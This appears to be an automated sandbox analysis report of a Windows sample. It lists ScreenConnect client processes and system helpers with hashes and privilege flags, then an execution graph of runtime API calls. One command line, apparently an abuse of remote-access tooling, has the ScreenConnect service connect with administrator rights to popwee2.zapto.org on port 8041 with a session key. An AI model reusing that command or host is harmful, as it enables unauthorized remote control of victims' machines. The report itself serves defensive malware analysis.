                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:06:44:40
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User"
                                                                                                                                                                                                                                                                  Imagebase:0x7e0000
                                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                                                                                                                                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                                                                                                                                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:06:44:52
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:3.8%
                                                                                                                                                                                                                                                                    Total number of Nodes:1465
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                    execution_graph 6126 f27570 6127 f275a9 6126->6127 6128 f247f9 __dosmaperr 15 API calls 6127->6128 6132 f275d5 _ValidateLocalCookies 6127->6132 6129 f275b2 6128->6129 6130 f2473d _abort 21 API calls 6129->6130 6131 f275bd _ValidateLocalCookies 6130->6131 5748 f28df1 5749 f28e15 5748->5749 5750 f28e2e 5749->5750 5753 f29beb __startOneArgErrorHandling 5749->5753 5754 f28e78 5750->5754 5756 f299d3 5750->5756 5752 f29c2d __startOneArgErrorHandling 5753->5752 5764 f2a1c4 5753->5764 5757 f299f0 DecodePointer 5756->5757 5758 f29a00 5756->5758 5757->5758 5759 f29a8d 5758->5759 5760 f29a82 _ValidateLocalCookies 5758->5760 5762 f29a37 5758->5762 5759->5760 5761 f247f9 __dosmaperr 15 API calls 5759->5761 5760->5754 5761->5760 5762->5760 5763 f247f9 __dosmaperr 15 API calls 5762->5763 5763->5760 5765 f2a1fd __startOneArgErrorHandling 5764->5765 5766 f2a224 __startOneArgErrorHandling 5765->5766 5773 f2a495 5765->5773 5768 f2a267 5766->5768 5769 f2a242 5766->5769 5784 f2a786 5768->5784 5777 f2a7b5 5769->5777 5772 f2a262 __startOneArgErrorHandling _ValidateLocalCookies 5772->5752 5774 f2a4c0 __raise_exc 5773->5774 5775 f2a6b9 RaiseException 5774->5775 5776 f2a6d1 5775->5776 5776->5766 5778 f2a7c4 5777->5778 5779 f2a838 __startOneArgErrorHandling 5778->5779 5781 f2a7e3 __startOneArgErrorHandling 5778->5781 5780 f2a786 __startOneArgErrorHandling 15 API calls 5779->5780 5783 f2a831 5780->5783 5782 f2a786 __startOneArgErrorHandling 15 API calls 5781->5782 5781->5783 5782->5783 5783->5772 5785 f2a793 5784->5785 5786 f2a7a8 5784->5786 5787 f2a7ad 5785->5787 5789 f247f9 __dosmaperr 15 API calls 5785->5789 5788 f247f9 __dosmaperr 15 API calls 5786->5788 5787->5772 5788->5787 5790 f2a7a0 5789->5790 5790->5772 5791 f21ff4 5794 f22042 5791->5794 5795 f2204b 5794->5795 5796 f21fff 5794->5796 5795->5796 5803 f223c3 5795->5803 5799 f223c3 43 API calls 5800 f22091 5799->5800 5817 f23e89 5800->5817 5823 f223d1 5803->5823 5805 f223c8 5806 f22086 5805->5806 5807 f26b14 _abort 2 API calls 5805->5807 5806->5799 5808 f23f29 5807->5808 5809 f23f35 5808->5809 5810 f26b6f _abort 33 API calls 5808->5810 5811 f23f3e IsProcessorFeaturePresent 5809->5811 5812 f23f5c 5809->5812 5810->5809 5813 f23f49 5811->5813 5814 f23793 _abort 23 API calls 5812->5814 5815 f24573 _abort 3 API calls 5813->5815 5816 f23f66 5814->5816 5815->5812 5818 f23e95 _abort 5817->5818 5819 f24424 _abort 33 API calls 5818->5819 5822 f23e9a 5819->5822 5820 f23f24 _abort 33 API calls 5821 f23ec4 5820->5821 5822->5820 5824 f223da 5823->5824 5825 f223dd GetLastError 5823->5825 5824->5805 5835 f226a4 5825->5835 5828 f22457 SetLastError 5828->5805 5829 f226df ___vcrt_FlsSetValue 6 API calls 5830 f2240b 5829->5830 5831 f22433 5830->5831 5832 f226df ___vcrt_FlsSetValue 6 API calls 5830->5832 5834 f22411 5830->5834 5833 f226df ___vcrt_FlsSetValue 6 API calls 5831->5833 5831->5834 5832->5831 5833->5834 5834->5828 5836 f22543 ___vcrt_FlsFree 5 API calls 5835->5836 5837 f226be 5836->5837 5838 f226d6 TlsGetValue 5837->5838 5839 f223f2 5837->5839 5838->5839 5839->5828 5839->5829 5839->5834 5969 f23eb5 5970 f23eb8 5969->5970 5971 f23f24 _abort 33 API calls 5970->5971 5972 f23ec4 5971->5972 5840 f212fb 5845 f21aac SetUnhandledExceptionFilter 5840->5845 5842 f21300 5846 f238f9 5842->5846 5844 f2130b 5845->5842 5847 f23905 5846->5847 5848 f2391f 5846->5848 5847->5848 5849 f247f9 __dosmaperr 15 API calls 5847->5849 5848->5844 5850 f2390f 5849->5850 5851 f2473d _abort 21 API calls 5850->5851 5852 f2391a 5851->5852 5852->5844 5973 f248bb 5974 f248cb 5973->5974 5983 f248e1 5973->5983 5975 f247f9 __dosmaperr 15 API calls 5974->5975 5976 f248d0 5975->5976 5977 f2473d _abort 21 API calls 5976->5977 5979 f248da 5977->5979 5980 f2494b 5980->5980 6003 f231ec 5980->6003 5982 f249b9 5985 f24869 _free 15 API calls 5982->5985 5983->5980 5986 f24a2c 5983->5986 5992 f24a4b 5983->5992 5984 f249b0 5984->5982 5989 f24a3e 5984->5989 6009 f279bb 5984->6009 5985->5986 6018 f24c65 5986->6018 5990 f2474d _abort 6 API calls 5989->5990 5991 f24a4a 5990->5991 5993 f24a57 5992->5993 5994 f2480c _abort 15 API calls 5993->5994 5995 f24a85 5994->5995 5996 f279bb 21 API calls 5995->5996 5997 f24ab1 5996->5997 5998 f2474d _abort 6 API calls 5997->5998 5999 f24ae0 _abort 5998->5999 6000 f24b81 FindFirstFileExA 5999->6000 6001 f24bd0 6000->6001 6002 f24a4b 21 API calls 6001->6002 6004 f23201 6003->6004 6005 f231fd 6003->6005 6004->6005 6006 f2480c _abort 15 API calls 6004->6006 6005->5984 6007 f2322f 6006->6007 6008 f24869 _free 15 API calls 6007->6008 6008->6005 6013 f2790a 6009->6013 6010 f2791f 6011 f247f9 __dosmaperr 15 API calls 6010->6011 6012 f27924 6010->6012 6014 f2794a 6011->6014 6012->5984 6013->6010 6013->6012 6016 f2795b 6013->6016 6015 f2473d _abort 21 API calls 6014->6015 6015->6012 6016->6012 6017 f247f9 __dosmaperr 15 API calls 6016->6017 6017->6014 6019 f24c6f 6018->6019 6020 f24c7f 6019->6020 6021 f24869 _free 15 API calls 6019->6021 6022 f24869 _free 15 API calls 6020->6022 6021->6019 6023 f24c86 6022->6023 6023->5979 6024 f214bb IsProcessorFeaturePresent 6025 f214d0 6024->6025 6028 f21493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6025->6028 6027 f215b3 6028->6027 6029 f21ab8 6030 f21aef 6029->6030 6031 f21aca 6029->6031 6031->6030 6038 f2209a 6031->6038 6036 f23e89 33 API calls 6037 f21b0d 6036->6037 6039 f223c3 43 API calls 6038->6039 6040 f21afc 6039->6040 6041 f220a3 6040->6041 6042 f223c3 43 API calls 6041->6042 6043 f21b06 6042->6043 6043->6036 6347 f2383f 6349 f2384b ___scrt_is_nonwritable_in_current_image 6347->6349 6348 f23882 _abort 6349->6348 6355 f256e2 EnterCriticalSection 6349->6355 6351 f2385f 6352 f267cb __fassign 15 API calls 6351->6352 6353 f2386f 6352->6353 6356 f23888 6353->6356 6355->6351 6359 f2572a LeaveCriticalSection 6356->6359 6358 f2388f 6358->6348 6359->6358 6133 f29160 6136 f2917e 6133->6136 6135 f29176 6140 f29183 6136->6140 6137 f299d3 16 API calls 6139 f293af 6137->6139 6138 f29218 6138->6135 6139->6135 6140->6137 6140->6138 5853 f28ce1 5854 f28d01 5853->5854 5857 f28d38 5854->5857 5856 f28d2b 5858 f28d3f 5857->5858 5859 f28da0 5858->5859 5863 f28d5f 5858->5863 5861 f2988e 5859->5861 5866 f29997 5859->5866 5861->5856 5863->5861 5864 f29997 16 API calls 5863->5864 5865 f298be 5864->5865 5865->5856 5867 f299a0 5866->5867 5870 f2a06f 5867->5870 5869 f28dee 5869->5856 5872 f2a0ae __startOneArgErrorHandling 5870->5872 5871 f2a130 __startOneArgErrorHandling 5874 f2a786 __startOneArgErrorHandling 15 API calls 5871->5874 5875 f2a166 _ValidateLocalCookies 5871->5875 5872->5871 5876 f2a472 5872->5876 5874->5875 5875->5869 5877 f2a495 __raise_exc RaiseException 5876->5877 5878 f2a490 5877->5878 5878->5871 6044 f256a1 6045 f256ac 6044->6045 6046 f259b3 6 API calls 6045->6046 6047 f256d5 6045->6047 6048 f256d1 6045->6048 6046->6045 6050 f256f9 6047->6050 6051 f25725 6050->6051 6052 f25706 6050->6052 6051->6048 6053 f25710 DeleteCriticalSection 6052->6053 6053->6051 6053->6053 6054 f25ba6 6055 f25bd7 6054->6055 6057 f25bb1 6054->6057 6056 f25bc1 FreeLibrary 6056->6057 6057->6055 6057->6056 6360 f26026 6361 f2602b 6360->6361 6362 f2604e 6361->6362 6364 f25c56 6361->6364 6365 f25c63 6364->6365 6369 f25c85 6364->6369 6366 f25c71 DeleteCriticalSection 6365->6366 6367 f25c7f 6365->6367 6366->6366 6366->6367 6368 f24869 _free 15 API calls 6367->6368 6368->6369 6369->6361 5879 f233e5 5880 f233f7 5879->5880 5881 f233fd 5879->5881 5883 f23376 5880->5883 5887 f233a0 5883->5887 5888 f23383 5883->5888 5884 f2339a 5886 f24869 _free 15 API calls 5884->5886 5885 f24869 _free 15 API calls 5885->5888 5886->5887 5887->5881 5888->5884 5888->5885 5889 f29beb 5890 f29c04 __startOneArgErrorHandling 5889->5890 5891 f2a1c4 16 API calls 5890->5891 5892 f29c2d __startOneArgErrorHandling 5890->5892 5891->5892 6370 f2142e 6373 f22cf0 6370->6373 6372 f2143f 6374 f244a8 _abort 15 API calls 6373->6374 6375 f22d07 _ValidateLocalCookies 6374->6375 6375->6372 6376 f2452d 6384 f25858 6376->6384 6378 f24537 6379 f24541 6378->6379 6380 f244a8 _abort 15 API calls 6378->6380 6381 f24549 6380->6381 6382 f24556 6381->6382 6389 f24559 6381->6389 6385 f25741 _abort 5 API calls 6384->6385 6386 f2587f 6385->6386 6387 f25897 TlsAlloc 6386->6387 6388 f25888 _ValidateLocalCookies 6386->6388 6387->6388 6388->6378 6390 f24563 6389->6390 6391 f24569 6389->6391 6393 f258ae 6390->6393 6391->6379 6394 f25741 _abort 5 API calls 6393->6394 6395 f258d5 6394->6395 6396 f258e1 _ValidateLocalCookies 6395->6396 6397 f258ed TlsFree 6395->6397 6396->6391 6397->6396 6058 f26893 GetProcessHeap 6141 f22f53 6142 f22f62 6141->6142 6143 f22f7e 6141->6143 6142->6143 6145 f22f68 6142->6145 6144 f2522b 46 API calls 6143->6144 6147 f22f85 GetModuleFileNameA 6144->6147 6146 f247f9 __dosmaperr 15 API calls 6145->6146 6148 f22f6d 6146->6148 6149 f22fa9 6147->6149 6150 f2473d _abort 21 API calls 6148->6150 6164 f23077 6149->6164 6151 f22f77 6150->6151 6154 f231ec 15 API calls 6155 f22fd3 6154->6155 6156 f22fe8 6155->6156 6157 f22fdc 6155->6157 6158 f23077 33 API calls 6156->6158 6159 f247f9 __dosmaperr 15 API calls 6157->6159 6161 f22ffe 6158->6161 6163 f22fe1 6159->6163 6160 f24869 _free 15 API calls 6160->6151 6162 f24869 _free 15 API calls 6161->6162 6161->6163 6162->6163 6163->6160 6166 f2309c 6164->6166 6165 f255b6 33 API calls 6165->6166 6166->6165 6168 f230fc 6166->6168 6167 f22fc6 6167->6154 6168->6167 6169 f255b6 33 API calls 6168->6169 6169->6168 5893 f25fd0 5894 f25fdc ___scrt_is_nonwritable_in_current_image 5893->5894 5905 f256e2 EnterCriticalSection 5894->5905 5896 f25fe3 5906 f25c8b 5896->5906 5898 f25ff2 5899 f26001 5898->5899 5919 f25e64 GetStartupInfoW 5898->5919 5930 f2601d 5899->5930 5902 f26012 _abort 5905->5896 5907 f25c97 ___scrt_is_nonwritable_in_current_image 5906->5907 5908 f25ca4 5907->5908 5909 f25cbb 5907->5909 5910 f247f9 __dosmaperr 15 API calls 5908->5910 5933 f256e2 EnterCriticalSection 5909->5933 5912 f25ca9 5910->5912 5913 f2473d _abort 21 API calls 5912->5913 5915 f25cb3 _abort 5913->5915 5914 f25cf3 5941 f25d1a 5914->5941 5915->5898 5916 f25cc7 5916->5914 5934 f25bdc 5916->5934 5920 f25e81 5919->5920 5921 f25f13 5919->5921 5920->5921 5922 f25c8b 22 API calls 5920->5922 5925 f25f1a 5921->5925 5923 f25eaa 5922->5923 5923->5921 5924 f25ed8 GetFileType 5923->5924 5924->5923 5929 f25f21 5925->5929 5926 f25f64 GetStdHandle 5926->5929 5927 f25fcc 5927->5899 5928 f25f77 GetFileType 5928->5929 5929->5926 5929->5927 5929->5928 5950 f2572a LeaveCriticalSection 5930->5950 5932 f26024 5932->5902 5933->5916 5935 f2480c _abort 15 API calls 5934->5935 5938 f25bee 5935->5938 5936 f25bfb 5937 f24869 _free 15 API calls 5936->5937 5939 f25c4d 5937->5939 5938->5936 5944 f259b3 5938->5944 5939->5916 5949 f2572a LeaveCriticalSection 5941->5949 5943 f25d21 5943->5915 5945 f25741 _abort 5 API calls 5944->5945 5946 f259da 5945->5946 5947 f259f8 InitializeCriticalSectionAndSpinCount 5946->5947 5948 f259e3 _ValidateLocalCookies 5946->5948 5947->5948 5948->5938 5949->5943 5950->5932 6398 f27a10 6401 f27a27 6398->6401 6402 f27a35 6401->6402 6403 f27a49 6401->6403 6404 f247f9 __dosmaperr 15 API calls 6402->6404 6405 f27a51 6403->6405 6406 f27a63 6403->6406 6407 f27a3a 6404->6407 6408 f247f9 __dosmaperr 15 API calls 6405->6408 6410 f23f72 __fassign 33 API calls 6406->6410 6413 f27a22 6406->6413 6411 f2473d _abort 21 API calls 6407->6411 6409 f27a56 6408->6409 6412 f2473d _abort 21 API calls 6409->6412 6410->6413 6411->6413 6412->6413 6170 f27351 6171 f2735e 6170->6171 6172 f2480c _abort 15 API calls 6171->6172 6173 f27378 6172->6173 6174 f24869 _free 15 API calls 6173->6174 6175 f27384 6174->6175 6176 f2480c _abort 15 API calls 6175->6176 6180 f273aa 6175->6180 6177 f2739e 6176->6177 6179 f24869 _free 15 API calls 6177->6179 6178 f259b3 6 API calls 6178->6180 6179->6180 6180->6178 6181 f273b6 6180->6181 6414 f27419 6424 f27fb2 6414->6424 6418 f27426 6437 f2828e 6418->6437 6421 f27450 6422 f24869 _free 15 API calls 6421->6422 6423 f2745b 6422->6423 6441 f27fbb 6424->6441 6426 f27421 6427 f281ee 6426->6427 6428 f281fa ___scrt_is_nonwritable_in_current_image 6427->6428 6461 f256e2 EnterCriticalSection 6428->6461 6430 f28270 6475 f28285 6430->6475 6432 f28205 6432->6430 6434 f28244 DeleteCriticalSection 6432->6434 6462 f2901c 6432->6462 6433 f2827c _abort 6433->6418 6435 f24869 _free 15 API calls 6434->6435 6435->6432 6438 f282a4 6437->6438 6439 f27435 DeleteCriticalSection 6437->6439 6438->6439 6440 f24869 _free 15 API calls 6438->6440 6439->6418 6439->6421 6440->6439 6442 f27fc7 ___scrt_is_nonwritable_in_current_image 6441->6442 6451 f256e2 EnterCriticalSection 6442->6451 6444 f2806a 6456 f2808a 6444->6456 6447 f28076 _abort 6447->6426 6449 f27f6b 61 API calls 6450 f27fd6 6449->6450 6450->6444 6450->6449 6452 f27465 EnterCriticalSection 6450->6452 6453 f28060 6450->6453 6451->6450 6452->6450 6459 f27479 LeaveCriticalSection 6453->6459 6455 f28068 6455->6450 6460 f2572a LeaveCriticalSection 6456->6460 6458 f28091 6458->6447 6459->6455 6460->6458 6461->6432 6463 f29028 ___scrt_is_nonwritable_in_current_image 6462->6463 6464 f29039 6463->6464 6465 f2904e 6463->6465 6466 f247f9 __dosmaperr 15 API calls 6464->6466 6474 f29049 _abort 6465->6474 6478 f27465 EnterCriticalSection 6465->6478 6467 f2903e 6466->6467 6469 f2473d _abort 21 API calls 6467->6469 6469->6474 6470 f2906a 6479 f28fa6 6470->6479 6472 f29075 6495 f29092 6472->6495 6474->6432 6733 f2572a LeaveCriticalSection 6475->6733 6477 f2828c 6477->6433 6478->6470 6480 f28fb3 6479->6480 6481 f28fc8 6479->6481 6482 f247f9 __dosmaperr 15 API calls 6480->6482 6486 f28fc3 6481->6486 6498 f27f05 6481->6498 6483 f28fb8 6482->6483 6485 f2473d _abort 21 API calls 6483->6485 6485->6486 6486->6472 6488 f2828e 15 API calls 6489 f28fe4 6488->6489 6504 f2732b 6489->6504 6491 f28fea 6511 f29d4e 6491->6511 6494 f24869 _free 15 API calls 6494->6486 6732 f27479 LeaveCriticalSection 6495->6732 6497 f2909a 6497->6474 6499 f27f19 6498->6499 6500 f27f1d 6498->6500 6499->6488 6500->6499 6501 f2732b 21 API calls 6500->6501 6502 f27f3d 6501->6502 6526 f289a7 6502->6526 6505 f27337 6504->6505 6506 f2734c 6504->6506 6507 f247f9 __dosmaperr 15 API calls 6505->6507 6506->6491 6508 f2733c 6507->6508 6509 f2473d _abort 21 API calls 6508->6509 6510 f27347 6509->6510 6510->6491 6512 f29d5d 6511->6512 6514 f29d72 6511->6514 6513 f247e6 __dosmaperr 15 API calls 6512->6513 6517 f29d62 6513->6517 6515 f29dad 6514->6515 6520 f29d99 6514->6520 6516 f247e6 __dosmaperr 15 API calls 6515->6516 6518 f29db2 6516->6518 6519 f247f9 __dosmaperr 15 API calls 6517->6519 6521 f247f9 __dosmaperr 15 API calls 6518->6521 6524 f28ff0 6519->6524 6689 f29d26 6520->6689 6523 f29dba 6521->6523 6525 f2473d _abort 21 API calls 6523->6525 6524->6486 6524->6494 6525->6524 6527 f289b3 ___scrt_is_nonwritable_in_current_image 6526->6527 6528 f289bb 6527->6528 6530 f289d3 6527->6530 6551 f247e6 6528->6551 6529 f28a71 6532 f247e6 __dosmaperr 15 API calls 6529->6532 6530->6529 6536 f28a08 6530->6536 6535 f28a76 6532->6535 6534 f247f9 __dosmaperr 15 API calls 6545 f289c8 _abort 6534->6545 6537 f247f9 __dosmaperr 15 API calls 6535->6537 6554 f25d23 EnterCriticalSection 6536->6554 6539 f28a7e 6537->6539 6541 f2473d _abort 21 API calls 6539->6541 6540 f28a0e 6542 f28a2a 6540->6542 6543 f28a3f 6540->6543 6541->6545 6544 f247f9 __dosmaperr 15 API calls 6542->6544 6555 f28a92 6543->6555 6547 f28a2f 6544->6547 6545->6499 6549 f247e6 __dosmaperr 15 API calls 6547->6549 6548 f28a3a 6604 f28a69 6548->6604 6549->6548 6552 f244a8 _abort 15 API calls 6551->6552 6553 f247eb 6552->6553 6553->6534 6554->6540 6556 f28ac0 6555->6556 6583 f28ab9 _ValidateLocalCookies 6555->6583 6557 f28ae3 6556->6557 6558 f28ac4 6556->6558 6560 f28b34 6557->6560 6561 f28b17 6557->6561 6559 f247e6 __dosmaperr 15 API calls 6558->6559 6562 f28ac9 6559->6562 6564 f28b4a 6560->6564 6607 f28f8b 6560->6607 6563 f247e6 __dosmaperr 15 API calls 6561->6563 6565 f247f9 __dosmaperr 15 API calls 6562->6565 6567 f28b1c 6563->6567 6610 f28637 6564->6610 6569 f28ad0 6565->6569 6572 f247f9 __dosmaperr 15 API calls 6567->6572 6570 f2473d _abort 21 API calls 6569->6570 6570->6583 6575 f28b24 6572->6575 6573 f28b91 6579 f28ba5 6573->6579 6580 f28beb WriteFile 6573->6580 6574 f28b58 6576 f28b7e 6574->6576 6577 f28b5c 6574->6577 6578 f2473d _abort 21 API calls 6575->6578 6622 f28417 GetConsoleCP 6576->6622 6581 f28c52 6577->6581 6617 f285ca 6577->6617 6578->6583 6585 f28bdb 6579->6585 6586 f28bad 6579->6586 6584 f28c0e GetLastError 6580->6584 6591 f28b74 6580->6591 6581->6583 6593 f247f9 __dosmaperr 15 API calls 6581->6593 6583->6548 6584->6591 6642 f286ad 6585->6642 6587 f28bb2 6586->6587 6588 f28bcb 6586->6588 6587->6581 6631 f2878c 6587->6631 6636 f2887a 6588->6636 6591->6581 6591->6583 6596 f28c2e 6591->6596 6595 f28c77 6593->6595 6599 f247e6 __dosmaperr 15 API calls 6595->6599 6597 f28c35 6596->6597 6598 f28c49 6596->6598 6600 f247f9 __dosmaperr 15 API calls 6597->6600 6647 f247c3 6598->6647 6599->6583 6602 f28c3a 6600->6602 6603 f247e6 __dosmaperr 15 API calls 6602->6603 6603->6583 6688 f25d46 LeaveCriticalSection 6604->6688 6606 f28a6f 6606->6545 6652 f28f0d 6607->6652 6674 f27eaf 6610->6674 6612 f28647 6613 f2864c 6612->6613 6614 f24424 _abort 33 API calls 6612->6614 6613->6573 6613->6574 6615 f2866f 6614->6615 6615->6613 6616 f2868d GetConsoleMode 6615->6616 6616->6613 6618 f28624 6617->6618 6621 f285ef 6617->6621 6618->6591 6619 f29101 WriteConsoleW CreateFileW 6619->6621 6620 f28626 GetLastError 6620->6618 6621->6618 6621->6619 6621->6620 6624 f2858c _ValidateLocalCookies 6622->6624 6629 f2847a 6622->6629 6624->6591 6625 f28500 WideCharToMultiByte 6625->6624 6626 f28526 WriteFile 6625->6626 6628 f285af GetLastError 6626->6628 6626->6629 6627 f272b7 35 API calls __fassign 6627->6629 6628->6624 6629->6624 6629->6625 6629->6627 6630 f28557 WriteFile 6629->6630 6683 f26052 6629->6683 6630->6628 6630->6629 6632 f2879b 6631->6632 6633 f28819 WriteFile 6632->6633 6634 f2885d _ValidateLocalCookies 6632->6634 6633->6632 6635 f2885f GetLastError 6633->6635 6634->6591 6635->6634 6641 f28889 6636->6641 6637 f28994 _ValidateLocalCookies 6637->6591 6638 f2890b WideCharToMultiByte 6639 f28940 WriteFile 6638->6639 6640 f2898c GetLastError 6638->6640 6639->6640 6639->6641 6640->6637 6641->6637 6641->6638 6641->6639 6644 f286bc 6642->6644 6643 f2872e WriteFile 6643->6644 6645 f28771 GetLastError 6643->6645 6644->6643 6646 f2876f _ValidateLocalCookies 6644->6646 6645->6646 6646->6591 6648 f247e6 __dosmaperr 15 API calls 6647->6648 6649 f247ce __dosmaperr 6648->6649 6650 f247f9 __dosmaperr 15 API calls 6649->6650 6651 f247e1 6650->6651 6651->6583 6661 f25dfa 6652->6661 6654 f28f1f 6655 f28f27 6654->6655 6656 f28f38 SetFilePointerEx 6654->6656 6659 f247f9 __dosmaperr 15 API calls 6655->6659 6657 f28f50 GetLastError 6656->6657 6658 f28f2c 6656->6658 6660 f247c3 __dosmaperr 15 API calls 6657->6660 6658->6564 6659->6658 6660->6658 6662 f25e07 6661->6662 6665 f25e1c 6661->6665 6663 f247e6 __dosmaperr 15 API calls 6662->6663 6664 f25e0c 6663->6664 6667 f247f9 __dosmaperr 15 API calls 6664->6667 6666 f247e6 __dosmaperr 15 API calls 6665->6666 6668 f25e41 6665->6668 6669 f25e4c 6666->6669 6670 f25e14 6667->6670 6668->6654 6671 f247f9 __dosmaperr 15 API calls 6669->6671 6670->6654 6672 f25e54 6671->6672 6673 f2473d _abort 21 API calls 6672->6673 6673->6670 6675 f27ec9 6674->6675 6676 f27ebc 6674->6676 6678 f27ed5 6675->6678 6679 f247f9 __dosmaperr 15 API calls 6675->6679 6677 f247f9 __dosmaperr 15 API calls 6676->6677 6680 f27ec1 6677->6680 6678->6612 6681 f27ef6 6679->6681 6680->6612 6682 f2473d _abort 21 API calls 6681->6682 6682->6680 6684 f24424 _abort 33 API calls 6683->6684 6685 f2605d 6684->6685 6686 f272d1 __fassign 33 API calls 6685->6686 6687 f2606d 6686->6687 6687->6629 6688->6606 6692 f29ca4 6689->6692 6691 f29d4a 6691->6524 6693 f29cb0 